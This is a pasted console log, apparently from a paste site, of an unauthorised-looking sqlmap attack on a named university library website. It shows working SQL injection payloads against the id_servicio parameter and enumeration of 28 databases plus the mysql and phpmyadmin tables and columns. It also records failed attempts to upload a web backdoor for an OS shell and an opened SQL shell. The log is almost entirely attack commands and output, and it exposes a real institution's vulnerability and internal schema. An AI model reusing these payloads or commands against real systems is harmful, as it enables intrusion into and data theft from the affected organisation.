- | estadisticas |
- | fasciculos |
- | hosts |
- | ipcountries |
- | ipcountries_copy |
- | keywords |
- | libros |
- | libros_autores |
- | libros_coeditores |
- | libros_copy1 |
- | libros_error00 |
- | libros_keywords |
- | libros_original |
- | libros_series |
- | libros_subseries |
- | libros_temas |
- | lista_de_usuarios_bidi |
- | lista_de_usuarios_revistas |
- | revistas |
- | revistas_copy |
- | series |
- | subseries |
- | temas |
- | temporal_libros |
- | usuarios |
- | usuarios_mig |
- | visitas |
- +----------------------------+
- [17:23:59] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:23:59
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:24:30
- [17:24:31] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:24:33] [INFO] testing MySQL
- [17:24:33] [INFO] confirming MySQL
- [17:24:33] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:24:33] [INFO] fetching database names
- [17:24:33] [INFO] the SQL query used returns 28 entries
- available databases [28]:
- [*] adq
- [*] aleph
- [*] areas_biblioteca
- [*] biblioteca_digital
- [*] cosei
- [*] cuentasxxi
- [*] descarteah
- [*] empleados
- [*] inegi
- [*] information_schema
- [*] jornadas
- [*] libreria
- [*] libreria_antes_actualizacion
- [*] multimedia_registro
- [*] mysql
- [*] oai-uamx
- [*] phpmyadmin
- [*] pib
- [*] planes_bibliografia
- [*] proctec
- [*] recursos_electronicos
- [*] resguardos
- [*] revistas_electronicas
- [*] salas
- [*] sscbs
- [*] tesis
- [*] tesis_pruebas
- [*] test
- [17:24:34] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:24:34
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D empleados --tables
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:25:17
- [17:25:17] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:25:19] [INFO] testing MySQL
- [17:25:19] [INFO] confirming MySQL
- [17:25:20] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:25:20] [INFO] fetching tables for database: 'empleados'
- [17:25:21] [INFO] fetching number of tables for database 'empleados'
- [17:25:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
- [17:25:21] [INFO] retrieved: 0
- [17:25:35] [WARNING] database 'empleados' appears to be empty
- [17:25:35] [ERROR] unable to retrieve the table names for any database
- do you want to use common table existence check? [y/N/q] y
- [17:25:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
- [17:25:42] [INFO] checking table existence using items from 'C:\Users\whitejoker52\Desktop\hacking\sqlmap\txt\common-tables.txt'
- [17:25:42] [INFO] adding words used on web page to the check list
- please enter number of threads? [Enter for 1 (current)] 10
- [17:25:44] [INFO] starting 10 threads
- [17:27:09] [INFO] tried 367/3466 items (11%)
- [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:27:12] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:27:12] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
- [17:28:41] [INFO] tried 718/3466 items (21%)
- [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:28:46] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:32:13] [INFO] tried 1532/3466 items (44%)
- [17:32:13] [WARNING] turning off pre-connect mechanism because of connection time out(s)
- [17:32:13] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
- [17:32:14] [INFO] tried 1534/3466 items (44%)
- [17:32:14] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
- [17:33:17] [INFO] tried 1815/3466 items (52%)
- [17:33:19] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:33:19] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:34:52] [INFO] tried 2235/3466 items (64%)
- [17:34:55] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:34:55] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:36:22] [INFO] tried 2596/3466 items (75%)
- [17:36:27] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:36:27] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:37:49] [INFO] tried 2971/3466 items (86%)
- [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:37:53] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:39:25] [INFO] tried 3343/3466 items (96%)
- [17:39:30] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:39:30] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:40:05] [WARNING] no table(s) found
- No tables found
- [17:40:05] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:40:05
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:40:13
- [17:40:13] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:40:16] [INFO] testing MySQL
- [17:40:16] [INFO] confirming MySQL
- [17:40:16] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:40:16] [INFO] fetching database names
- [17:40:16] [INFO] the SQL query used returns 28 entries
- available databases [28]:
- [*] adq
- [*] aleph
- [*] areas_biblioteca
- [*] biblioteca_digital
- [*] cosei
- [*] cuentasxxi
- [*] descarteah
- [*] empleados
- [*] inegi
- [*] information_schema
- [*] jornadas
- [*] libreria
- [*] libreria_antes_actualizacion
- [*] multimedia_registro
- [*] mysql
- [*] oai-uamx
- [*] phpmyadmin
- [*] pib
- [*] planes_bibliografia
- [*] proctec
- [*] recursos_electronicos
- [*] resguardos
- [*] revistas_electronicas
- [*] salas
- [*] sscbs
- [*] tesis
- [*] tesis_pruebas
- [*] test
- [17:40:16] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:40:16
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D mysql --tables
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:40:46
- [17:40:46] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:40:49] [INFO] testing MySQL
- [17:40:49] [INFO] confirming MySQL
- [17:40:49] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:40:49] [INFO] fetching tables for database: 'mysql'
- [17:40:51] [INFO] the SQL query used returns 17 entries
- [17:40:53] [INFO] retrieved: columns_priv
- [17:40:55] [INFO] retrieved: db
- [17:40:56] [INFO] retrieved: func
- [17:40:59] [INFO] retrieved: help_category
- [17:41:01] [INFO] retrieved: help_keyword
- [17:41:03] [INFO] retrieved: help_relation
- [17:41:05] [INFO] retrieved: help_topic
- [17:41:08] [INFO] retrieved: host
- [17:41:10] [INFO] retrieved: proc
- [17:41:11] [INFO] retrieved: procs_priv
- [17:41:14] [INFO] retrieved: tables_priv
- [17:41:15] [INFO] retrieved: time_zone
- [17:41:17] [INFO] retrieved: time_zone_leap_second
- [17:41:20] [INFO] retrieved: time_zone_name
- [17:41:22] [INFO] retrieved: time_zone_transition
- [17:41:25] [INFO] retrieved: time_zone_transition_type
- [17:41:27] [INFO] retrieved: user
- Database: mysql
- [17 tables]
- +---------------------------+
- | user |
- | columns_priv |
- | db |
- | func |
- | help_category |
- | help_keyword |
- | help_relation |
- | help_topic |
- | host |
- | proc |
- | procs_priv |
- | tables_priv |
- | time_zone |
- | time_zone_leap_second |
- | time_zone_name |
- | time_zone_transition |
- | time_zone_transition_type |
- +---------------------------+
- [17:41:27] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:41:27
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D mysql -T db --columns
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:41:44
- [17:41:44] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:41:47] [INFO] testing MySQL
- [17:41:47] [INFO] confirming MySQL
- [17:41:47] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:41:47] [INFO] fetching columns for table 'db' in database 'mysql'
- [17:41:48] [INFO] the SQL query used returns 20 entries
- [17:41:50] [INFO] retrieved: "Host","char(60)"
- [17:41:52] [INFO] retrieved: "Db","char(64)"
- [17:41:54] [INFO] retrieved: "User","char(16)"
- [17:41:55] [INFO] retrieved: "Select_priv","enum('N','Y')"
- [17:41:57] [INFO] retrieved: "Insert_priv","enum('N','Y')"
- [17:41:59] [INFO] retrieved: "Update_priv","enum('N','Y')"
- [17:42:01] [INFO] retrieved: "Delete_priv","enum('N','Y')"
- [17:42:04] [INFO] retrieved: "Create_priv","enum('N','Y')"
- [17:42:06] [INFO] retrieved: "Drop_priv","enum('N','Y')"
- [17:42:07] [INFO] retrieved: "Grant_priv","enum('N','Y')"
- [17:42:09] [INFO] retrieved: "References_priv","enum('N','Y')"
- [17:42:12] [INFO] retrieved: "Index_priv","enum('N','Y')"
- [17:42:14] [INFO] retrieved: "Alter_priv","enum('N','Y')"
- [17:42:15] [INFO] retrieved: "Create_tmp_table_priv","enum('N','Y')"
- [17:42:17] [INFO] retrieved: "Lock_tables_priv","enum('N','Y')"
- [17:42:19] [INFO] retrieved: "Create_view_priv","enum('N','Y')"
- [17:42:21] [INFO] retrieved: "Show_view_priv","enum('N','Y')"
- [17:42:23] [INFO] retrieved: "Create_routine_priv","enum('N','Y')"
- [17:42:25] [INFO] retrieved: "Alter_routine_priv","enum('N','Y')"
- [17:42:26] [INFO] retrieved: "Execute_priv","enum('N','Y')"
- Database: mysql
- Table: db
- [20 columns]
- +-----------------------+---------------+
- | Column | Type |
- +-----------------------+---------------+
- | User | char(16) |
- | Alter_priv | enum('N','Y') |
- | Alter_routine_priv | enum('N','Y') |
- | Create_priv | enum('N','Y') |
- | Create_routine_priv | enum('N','Y') |
- | Create_tmp_table_priv | enum('N','Y') |
- | Create_view_priv | enum('N','Y') |
- | Db | char(64) |
- | Delete_priv | enum('N','Y') |
- | Drop_priv | enum('N','Y') |
- | Execute_priv | enum('N','Y') |
- | Grant_priv | enum('N','Y') |
- | Host | char(60) |
- | Index_priv | enum('N','Y') |
- | Insert_priv | enum('N','Y') |
- | Lock_tables_priv | enum('N','Y') |
- | References_priv | enum('N','Y') |
- | Select_priv | enum('N','Y') |
- | Show_view_priv | enum('N','Y') |
- | Update_priv | enum('N','Y') |
- +-----------------------+---------------+
- [17:42:26] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:42:26
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:42:38
- [17:42:38] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:42:41] [INFO] testing MySQL
- [17:42:41] [INFO] confirming MySQL
- [17:42:41] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:42:41] [INFO] fetching database names
- [17:42:41] [INFO] the SQL query used returns 28 entries
- available databases [28]:
- [*] adq
- [*] aleph
- [*] areas_biblioteca
- [*] biblioteca_digital
- [*] cosei
- [*] cuentasxxi
- [*] descarteah
- [*] empleados
- [*] inegi
- [*] information_schema
- [*] jornadas
- [*] libreria
- [*] libreria_antes_actualizacion
- [*] multimedia_registro
- [*] mysql
- [*] oai-uamx
- [*] phpmyadmin
- [*] pib
- [*] planes_bibliografia
- [*] proctec
- [*] recursos_electronicos
- [*] resguardos
- [*] revistas_electronicas
- [*] salas
- [*] sscbs
- [*] tesis
- [*] tesis_pruebas
- [*] test
- [17:42:41] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:42:41
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D phpmyadmin --tables
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:43:09
- [17:43:10] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:43:12] [INFO] testing MySQL
- [17:43:12] [INFO] confirming MySQL
- [17:43:12] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:43:12] [INFO] fetching tables for database: 'phpmyadmin'
- [17:43:14] [INFO] the SQL query used returns 7 entries
- [17:43:16] [INFO] retrieved: pma_bookmark
- [17:43:18] [INFO] retrieved: pma_column_info
- [17:43:20] [INFO] retrieved: pma_history
- [17:43:21] [INFO] retrieved: pma_pdf_pages
- [17:43:23] [INFO] retrieved: pma_relation
- [17:43:25] [INFO] retrieved: pma_table_coords
- [17:43:26] [INFO] retrieved: pma_table_info
- Database: phpmyadmin
- [7 tables]
- +------------------+
- | pma_bookmark |
- | pma_column_info |
- | pma_history |
- | pma_pdf_pages |
- | pma_relation |
- | pma_table_coords |
- | pma_table_info |
- +------------------+
- [17:43:27] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:43:27
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --os-shell
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:43:36
- [17:43:36] [INFO] resuming back-end DBMS 'mysql'
- [17:43:36] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:43:39] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL 5
- [17:43:39] [INFO] going to use a web backdoor for command prompt
- [17:43:39] [INFO] fingerprinting the back-end DBMS operating system
- [17:43:41] [INFO] the back-end DBMS operating system is Windows
- which web application language does the web server support?
- [1] ASP (default)
- [2] ASPX
- [3] JSP
- [4] PHP
- >
- [17:43:57] [INFO] retrieved the web server document root: 'C:\AppServ\www'
- [17:43:57] [INFO] retrieved web server absolute paths: 'C:/AppServ/www/cosei/servicio.html'
- [17:43:57] [INFO] trying to upload the file stager on 'C:/AppServ/www/' via LIMIT 'LINES TERMINATED BY' method
- sqlmap got a 302 redirect to 'http://biblioteca.xoc.uam.mx'. Do you want to follow? [Y/n] n
- [17:44:10] [WARNING] unable to upload the file stager on 'C:/AppServ/www/'
- [17:44:10] [INFO] trying to upload the file stager on 'C:/AppServ/www/' via UNION method
- [17:44:10] [WARNING] the injection is on a GET parameter and the file to be written hexadecimal value is 8814 bytes, this might cause errors in the file writing process
- [17:44:11] [WARNING] expect junk characters inside the file as a leftover from UNION query
- [17:44:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
- [17:44:15] [INFO] trying to upload the file stager on 'C:/AppServ/www/cosei/' via LIMIT 'LINES TERMINATED BY' method
- [17:44:19] [WARNING] unable to upload the file stager on 'C:/AppServ/www/cosei/'
- [17:44:19] [INFO] trying to upload the file stager on 'C:/AppServ/www/cosei/' via UNION method
- [17:44:19] [WARNING] the injection is on a GET parameter and the file to be written hexadecimal value is 8842 bytes, this might cause errors in the file writing process
- [17:44:23] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
- [17:44:25] [WARNING] HTTP error codes detected during run:
- 414 (Request-URI Too Long) - 4 times
- [17:44:25] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:44:25
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --sql-shell
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:44:35
- [17:44:36] [INFO] resuming back-end DBMS 'mysql'
- [17:44:36] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:44:38] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL 5
- [17:44:38] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
- sql-shell> help
- [17:44:44] [INFO] fetching SQL query output: 'help'
- [17:44:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
- [17:44:46] [INFO] retrieved:
- [17:44:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
- sql-shell>
- sql-shell>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement